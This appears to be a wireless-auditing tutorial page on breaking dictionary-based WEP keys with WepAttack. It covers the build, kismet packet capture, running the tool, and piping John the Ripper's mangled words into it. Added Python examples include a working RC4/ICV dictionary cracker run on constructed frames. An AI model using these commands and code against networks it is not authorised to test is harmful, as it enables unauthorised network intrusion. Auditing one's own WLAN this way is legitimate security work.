WepAttack Main:

"WepAttack is a WLAN open source Linux tool for breaking 802.11 WEP keys. This tool is based on an active dictionary attack that tests millions of words to find the right key.  Only one packet is required to start an attack." -wepattack.sourceforge.net

Project homepage: http://wepattack.sourceforge.net/

Local Mirror: WepAttack-0.1.3.tar.gz  MD5: be5a77902c992096dd95069bdade343b

WepAttack is probably the quickest way into a WEP-enabled WLAN whose key was set from a dictionary word (a key made of random hex digits is out of reach of a dictionary attack). We see regular WepAttack audits as essential on home WLANs (businesses should be using something stronger than WEP!), much as regular L0phtCrack password audits are.

 

Installing WepAttack:

Project homepage: http://wepattack.sourceforge.net/

The following installation process assumes that you are using the Auditing Laptop Build as described in the Auditing Laptop Build: HOWTO.

Download WepAttack-0.1.3.tar.gz from http://sourceforge.net/projects/wepattack/ to /tools/wifi/ and check its md5sum against the value listed above before unpacking it.

tar zxvf WepAttack-0.1.3.tar.gz

cd WepAttack-0.1.3/src

make

make install

 

wepattack (should now show the wepattack help)

 

 

Trouble shooting:

 

If, while running make, you receive the following error:

gcc  -o wepattack wepattack.o rc4.o wepfilter.o log.o\
              modes.o misc.o verify.o keygen.o -lpcap -z -lcrypto
gcc: log.omodes.o: No such file or directory
make: *** [wepattack] Error 1

the cause is a missing space before the trailing backslash on line 24 of WepAttack-0.1.3/src/Makefile: the line continuation joins log.o directly to modes.o on the next line, so the linker looks for a single object file called log.omodes.o. Edit line 24 and add a space before the backslash, so that

$(LD)  $(LDFLAGS)  -o  $@  wepattack.o  rc4.o  wepfilter.o  log.o\

reads

$(LD)  $(LDFLAGS)  -o  $@  wepattack.o  rc4.o  wepfilter.o  log.o  \

Now re-run make and the build should complete.

 

 

Installing WepAttack wordlist:

WepAttack also provides its own 31MB wordlist (wordlist.tar.gz) for download from http://sourceforge.net/projects/wepattack/. Download it (or your own custom wordlist) to /tools/wifi/WepAttack-0.1.3/src and unpack it:

cd /tools/wifi/WepAttack-0.1.3/src

tar zxvf wordlist.tar.gz

and you're done : )

 

 

 

Capturing Encrypted Packets:

Before we can attempt to break any WEP key with WepAttack's dictionary attack we first need to capture one encrypted packet. The easiest way to do this is with kismet, although any tool that writes dump files in pcap format (e.g. tcpdump or Ethereal) can be used. Assuming you have installed kismet as per our instructions, proceed as follows:

kismet

Use 's' to sort the networks and 'f' to sort by first time seen

Use 'L' to lock kismet to the channel of the desired network

Now we simply wait until we have captured an encrypted packet or packets. The Info window on the right-hand side of the kismet display and its Cryptd counter show when we have the necessary packet. Note that Cryptd counts every protected data frame kismet saw, so also check that the network's encryption flag shows WEP rather than WPA, since WepAttack only handles WEP.

NOTE: In our capture the Cryptd counter reached 44 encrypted packets, but only 1 is required.

 

Now that we have our encrypted packets, exit kismet with 'Q'.

 

My kismet dump is now auto saved to /tmp/Kismet-Dec-01-2005-3.dump (filename will obviously vary)
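Before handing a dump to wepattack it is worth confirming, independently of kismet's on-screen counters, that the file really contains a WEP-protected data frame for the BSSID you care about. The following script is an added example written for this page; it is not part of WepAttack or Kismet. It walks a classic libpcap file, assumes the frames are raw 802.11 with no Prism or radiotap header (link type 105, which is what this page's kismet dump is assumed to contain), and counts WEP data frames per BSSID, telling WEP from TKIP/CCMP by the ExtIV bit of the key-id byte. The capture it scans is constructed in memory so it runs offline; pass the bytes of your own dump to count_wep_frames() to check a real one.

```python
import struct
from collections import Counter

LINKTYPE_IEEE802_11 = 105   # raw 802.11 frames, no Prism/radiotap header (assumed)

def iter_pcap(data):
    """Yield each captured frame from a classic libpcap file held in memory."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a libpcap file")
    linktype, = struct.unpack_from(end + "I", data, 20)
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected link type 105 (raw 802.11), got %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield bytes(data[off:off + incl_len])
        off += incl_len

def header_len(frame):
    """802.11 data-frame header: 24 bytes, +6 for 4-address (WDS), +2 for QoS."""
    n = 24
    if (frame[1] & 0x03) == 0x03:
        n += 6
    if frame[0] & 0x80:
        n += 2
    return n

def is_wep_data_frame(frame):
    """Data frame with the Protected bit set and a WEP (not TKIP/CCMP) IV header:
    the ExtIV bit (0x20) of the key-id byte is clear for WEP."""
    if len(frame) < 32:
        return False
    ftype = (frame[0] >> 2) & 0x03          # 0 management, 1 control, 2 data
    if ftype != 2 or not (frame[1] & 0x40):
        return False
    hdr = header_len(frame)
    if len(frame) < hdr + 4 + 4:            # IV+keyid and at least an ICV
        return False
    return (frame[hdr + 3] & 0x20) == 0

def bssid_of(frame):
    """Which address field holds the BSSID depends on the To-DS/From-DS bits."""
    ds = frame[1] & 0x03
    if ds == 0:
        addr = frame[16:22]     # addr3
    elif ds == 1:
        addr = frame[4:10]      # To-DS: addr1
    else:
        addr = frame[10:16]     # From-DS: addr2 (for WDS, the transmitting AP)
    return ":".join("%02x" % b for b in addr)

def count_wep_frames(data):
    """{bssid: number of WEP data frames}: a scripted version of Kismet's Cryptd count."""
    counts = Counter()
    for frame in iter_pcap(data):
        if is_wep_data_frame(frame):
            counts[bssid_of(frame)] += 1
    return dict(counts)

# --- Constructed sample capture (not a real dump) -------------------------------
def _frame(fc0, fc1, a1, a2, a3, body):
    return bytes([fc0, fc1]) + b"\x00\x00" + a1 + a2 + a3 + b"\x10\x00" + body

def build_pcap(frames, linktype=LINKTYPE_IEEE802_11):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1133438400 + i, 0, len(f), len(f)) + f
    return out

AP, AP_OPEN = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
STA, BCAST = bytes.fromhex("0a0b0c0d0e0f"), b"\xff" * 6
WEP_BODY = bytes.fromhex("a1b2c3") + b"\x00" + b"\x11" * 40   # IV, keyid 0, opaque payload
FRAMES = [
    _frame(0x80, 0x00, BCAST, AP, AP, b"\x00" * 12),            # beacon: management, ignored
    _frame(0x08, 0x41, AP, STA, BCAST, WEP_BODY),               # WEP data, To-DS (BSSID = addr1)
    _frame(0x08, 0x42, STA, AP, STA, WEP_BODY),                 # WEP data, From-DS (BSSID = addr2)
    _frame(0x08, 0x01, AP_OPEN, STA, BCAST, b"\xaa\xaa\x03" + b"\x00" * 20),  # open network
    _frame(0x88, 0x41, AP, STA, BCAST, b"\x00\x00" + bytes.fromhex("a1b2c3") + b"\x20" + b"\x11" * 40),  # QoS, TKIP
]
SAMPLE_PCAP = build_pcap(FRAMES)

if __name__ == "__main__":
    print(count_wep_frames(SAMPLE_PCAP))   # {'00:11:22:33:44:55': 2}
```

Only the two WEP data frames for 00:11:22:33:44:55 are counted: the beacon is management traffic, the open network's frame has no Protected bit, and the QoS frame carries TKIP (ExtIV set), which wepattack cannot attack. If your dump was written with a Prism or radiotap header the link type check will refuse it; strip or skip that header first.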

 

 

Using WepAttack:

usage: wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]

Now we process the kismet dump file with WepAttack against our specified wordlist:

cd /tools/wifi/WepAttack-0.1.3/src

wepattack -f /tmp/Kismet-Dec-01-2005-3.dump -w wordlist -m 128

*This attacks every network in the dump; to target one network use the -n switch. -m 128 restricts the search to 128-bit keys; see wepattack's help for the other modes.

 

 

Results are written to WepAttack-[current_date].log

If the network's WEP key was generated from a word that is contained in the wordlist you are using, WepAttack will recover it. A key set from random hex digits will not fall to a dictionary attack, which is the one real defence a WEP network has against this tool.

 

 

Using JtR with WepAttack:

Optionally, John the Ripper (JtR) can be used to expand your WepAttack audit; it will also need installing:

Download john-1.6.tar.gz from http://www.openwall.com/john/ to /tools/wifi/

cd /tools/wifi

tar zxvf john-1.6.tar.gz

cd john-1.6/src

make linux-x86-mmx-elf

To allow us to run john from the WepAttack directory:

ln -s /tools/wifi/john-1.6/run/john  /tools/wifi/WepAttack-0.1.3/src

cp /tools/wifi/john-1.6/run/john.ini  /tools/wifi/WepAttack-0.1.3/src

John the Ripper (JtR) is a very efficient password cracker. JtR is able to take a word from a dictionary file and generate different variations of the same word, e.g. world would be expanded to World, w0rld, world1 etc.

To feed JtR's output to WepAttack (which reads candidate keys from stdin when no -w wordlist is given) we use the following syntax:

./john -wordfile:wordlist -rules -stdout | wepattack -f /tmp/Kismet-Dec-01-2005-3.dump

Using JtR to generate variations on the default wordlist expands the dictionary attack from 3,290,000 words to well in excess of 15,500,000 candidates!
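To make concrete what the dictionary attack in the Using WepAttack section and the JtR rule expansion above actually do, here is an added example written for this page; it is not WepAttack's or John the Ripper's code. It builds a WEP frame body under a key of its own choosing (the keys, IVs, payload and wordlist are all constructed), then tries each wordlist entry as a key, verifying a candidate the way a single captured packet allows: decrypt with RC4 under IV || key and check the CRC-32 ICV. It assumes, as this page's -m 128 run suggests, that a word is mapped to the key as its raw ASCII bytes (5 characters for 64-bit WEP, 13 for 128-bit). The jtr_like_rules() function is a hand-written stand-in for a few of John's -rules mangling rules, not John itself.

```python
import struct
import zlib

def rc4(key, data):
    """Plain RC4: key-scheduling over the key, then the keystream XORed into data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(key, iv, plaintext, keyid=0):
    """WEP frame body: IV(3) | keyid(1) | RC4(iv||key, plaintext || ICV)."""
    return iv + bytes([keyid << 6]) + rc4(iv + key, plaintext + icv(plaintext))

def wep_try_key(key, body):
    """Decrypt body with key; return the plaintext if the ICV verifies, else None."""
    iv, ct = body[:3], body[4:]
    pt = rc4(iv + key, ct)
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None

LLC_SNAP = b"\xaa\xaa\x03"   # how the plaintext of a WEP data frame normally starts

def word_to_keys(word):
    """Keys a word yields (assumption: raw ASCII, 5 bytes for 64-bit, 13 for 128-bit)."""
    raw = word.encode("ascii", "ignore")
    if len(raw) in (5, 13):
        yield raw

def jtr_like_rules(word):
    """A small subset of John's -rules: identity, capitalised, upper-cased,
    a leet substitution, then a trailing digit."""
    seen = set()
    leet = word.replace("o", "0").replace("e", "3").replace("a", "4")
    for cand in [word, word.capitalize(), word.upper(), leet] + [word + str(d) for d in range(10)]:
        if cand not in seen:
            seen.add(cand)
            yield cand

def crack(body, wordlist, rules=False):
    """Try every candidate key from the wordlist (optionally rule-expanded)
    against one captured frame body. Returns (word, key) on a verified hit."""
    for word in wordlist:
        for cand in (jtr_like_rules(word) if rules else (word,)):
            for key in word_to_keys(cand):
                pt = wep_try_key(key, body)
                # The ICV is only a 32-bit check, so over millions of candidates a
                # false hit is possible; also require the LLC/SNAP header.
                if pt is not None and pt.startswith(LLC_SNAP):
                    return cand, key
    return None

# Constructed sample: two frames under keys of our own choosing (not from the page).
PLAINTEXT = LLC_SNAP + b"\x00\x00\x00\x08\x06" + b"constructed ARP-like payload"
BODY_64 = wep_encrypt(b"tiger", b"\x01\x02\x03", PLAINTEXT)            # 40-bit key
BODY_128 = wep_encrypt(b"w0rld0fw3pk3y", b"\x0a\x0b\x0c", PLAINTEXT)    # 104-bit key
WORDLIST = ["tiger", "letmein", "worldofwepkey"]

if __name__ == "__main__":
    print(crack(BODY_64, WORDLIST))               # ('tiger', b'tiger')
    print(crack(BODY_128, WORDLIST))              # None: the plain word is not the key
    print(crack(BODY_128, WORDLIST, rules=True))  # ('w0rld0fw3pk3y', b'w0rld0fw3pk3y')
```

The 64-bit key falls to the plain wordlist, but the 128-bit key was set from a leet-speak variant of a dictionary word, so the plain run returns nothing and only the rule-expanded run finds it; that is the gap the john | wepattack pipeline above closes. Because a single packet gives only the 32-bit ICV to check against, the example also demands the decrypted body start with AA AA 03 before reporting a key, which keeps a large expanded dictionary from producing a spurious hit.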


 

 
 
  © Copyright 2010 Wirelessdefence.org. All Rights Reserved.